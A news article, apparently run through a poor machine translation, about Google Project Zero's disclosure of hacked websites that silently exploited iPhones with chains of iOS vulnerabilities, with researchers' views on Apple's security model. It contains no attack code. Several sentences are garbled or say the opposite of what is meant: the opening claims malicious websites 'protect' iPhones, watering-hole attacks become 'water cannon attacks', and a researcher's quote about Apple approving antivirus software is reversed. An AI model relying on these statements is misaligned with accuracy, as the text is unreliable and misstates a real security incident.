Google's disclosure last night that malicious websites may protect thousands of iPhones against spyware is not just a one-day message. This fundamentally changes the game in terms of iOS security.
For the past 12 years, iOS has been the gold standard for operating system security, a standard that developers of Android, macOS and Windows could only pursue. With the fingers of one hand, you can count the iOS malware found on the wilderness jailbroken iPhones – ever before.
You can rely on iOS to ensure your safety, unless you were a well-known dissident in a repressive but relatively wealthy country. You can not worry that Apple does not allow or require anti-virus software.
Today, the number of known iOS exploits working in the wild has doubled. Suddenly, iOS does not seem so safe anymore. If a relatively sloppy group of hackers in the US could indiscriminately compromise the iPhone for over two years, including phones with the latest versions of iOS, how many other iOS hacking campaigns are there?
"For this one campaign we've seen, there are almost certainly others left to see," says the Google Project Zero blog post, which unveils the malware campaign.
"That's pretty scary," he wrote to Malwarebyte's security researcher Thomas Reed on Twitter. "iPhone infections are more scary because there's absolutely no way to tell if your phone is infected without expert help … and maybe not even then!"
Frankly, how safe is your iPhone now? It seems a lot less safe than yesterday.
MORE: Best Mac Antivirus Software
So, what happened?
To keep you informed, Google Project zero researcher Ian Beer has published a series of long blog posts last night at about 8 pm Eastern Time, or midnight GMT, describing how Google's Threat Analysis Group is beginning This year, "discovered a small collection of hacked sites" used for "random water cannon attacks" against iPhone users.
Project Zero took a look, figured out what's going on, and told Apple about it. Apple fixes the underlying bugs that made the attacks possible within a week with iOS 12.1.4 on February 7th. (Other bugs used in the attacks have already been fixed, but some iPhones were still vulnerable to them.)
Problem solved? In the short term yes. But the fact that this took so long without anyone noticing, least of all Apple, really matters.
A market-changing change?
Functioning iOS exploits have been considered so rare and expensive that even well-funded national-state attackers have been able to use them sparingly and only against the ultimate goals.
Beer refers cryptically to "the millionaire dissident" in his introductory article. He refers to a human rights activist in the United Arab Emirates whom someone had turned against in 2016 to get him to click on a fool-caught website jailbreaking the visitor's iPhone with a previously unknown iOS exploit "Spyware was easy to install.
One-click iOS exploits that require no action from the target and no sign that the device was compromised have been privately sold for up to $ 1 million. However, their durability is short as they are quickly repaired when discovered, as was the case with the UAE's human rights activist – Apple patched the exploit three weeks after the activist found and reported it.
] However, the websites found by Google's researchers used 14 different iOS vulnerabilities, which were linked in different ways to create as many as five one-click iOS exploits, and damaged multiple websites that did not iPhones of one or more targeted individuals specifically lured to these websites, but the iPhones of anyone who has visited the sites.
Beer estimates that these sites receive "thousands of visitors a week". His use of the present indicates that the websites are still in operation.
He also found that the implementation of the exploits was flawed. The attackers made no effort to encrypt the data that sent their spyware back to the attackers' servers or to disguise the servers that stored the data. Anyone who owns a copy of Wireshark could have "sniffed" the unencrypted data transmitted over a Wi-Fi network in a blog entry today. "This suggests that the exploits and the implant were not only developed by different teams, but also by teams with dramatically different abilities."
This could be an attacking group that does not care if it loses millions of dollars in working iOS exploits – or one that has reason to believe that working iOS exploits are much rarer than we do had thought.
Could Apple intercept this instead of Google?
The cost of delivering all of these zero-days could be so public Beer pointed out that it was worth it for the attackers, despite the risk of discovery.
"I will not discuss whether these exploits cost $ 1 million, $ 2 million, or $ 20 million," he wrote. "All these prices seem to be low in order to track and monitor the private activities of whole populations in real time."
But that leaves open the question of how long it took for the exploits to be discovered. Marcus Hutchins, the man who is known to have stopped the outbreak of WannaCry ransomware and served prison terms as an indirect result, believes Apple dropped the ball.
This, "Hutchins wrote on Twitter." Bug bounties are cool and all, but good telemetry "- the ability to see what your own software does on a network – is much more important."
In a conversation with Tom's guide, Thomas Reed of Malwarebytes countered that Apple may not have been able to.
"I'm not sure if Apple could have realized this, especially because the controls on iOS are so restrictive that the visibility of an infection on the device is almost nonexistent." Reed told us, "Of course telemetry may be sent back to Apple, which I do not know could give Apple a hint … but I do not think so, considering Apple's attitude to privacy."
Visibility is part of the problem, Reed added. Unlike Android, iOS is a black box. Security researchers have had trouble parsing it, and iOS users have no idea what the file system looks like on their devices, or even how much RAM their devices bring.
"The fact that this was not discovered, f or two years is pretty meaningful and I think they tell an interesting story," he added. "Apple does not allow the scanning of iOS devices in any way, but if that had been possible, it probably would not have taken two years."
Alex Stamos, formerly head of security at Yahoo and Facebook and now a professor at Stanford, also blamed Apple's lack of transparency and near total control over the iOS ecosystem – two things previously considered necessary to maintain high security standards.
"Many things to learn from this incident, but one of them is the security cost of anti-competitive iOS app store policies." Stamos tweeted . "Chrome / Brave / Firefox must use the standard WebKit / JS [to run on iOS, making them merely skinned versions of Safari] .If Apple does not want to take the necessary action to protect users, they should leave it to others."
He listed three things which Microsoft was accused 20 years ago and which probably applies to Apple today: "rental seekers on platform control" such as Apple's 30 percent reduction in iOS app revenue, "content moderation on behalf of" autocracies "- Apple has with the Chinese government in the area of censorship and "risk of software monoculture". We can see the results from yesterday's release.
How can we fix this?
The conclusion is that iOS now clearly has a security problem. I did not expect to ever say that, but the iOS security rock was already a long way off – another version of Google Project Zero revealed many bugs in iMessage earlier this summer.
We asked Reed if Apple might consider allowing third-party antivirus software on iOS devices, as is the case with Android.
"I do not think anti-virus software on iOS is the answer," he replied. "Not only do I think that Apple would approve of this, it would also bring potentially dangerous capabilities into the hands of iOS developers."
"What I think would be better Apple-sanctioned file system access on "iOS device," Reed said, stating that this should only be possible under tightly controlled conditions.
In the long run, knowing that iOS is not so sure could be a good thing. Apple seems to know it too. Earlier this month, it announced that it would allow accredited researchers access to special iPhones that are easier to hack, and it raised the bug bounty for iOS errors discovered by independent researchers to a maximum of 1.5 million U.S. dollar.
Last night's revelations put Apple's transparency-enhancing decisions in a new light. Maybe Apple realizes that it now needs the hackers on its side.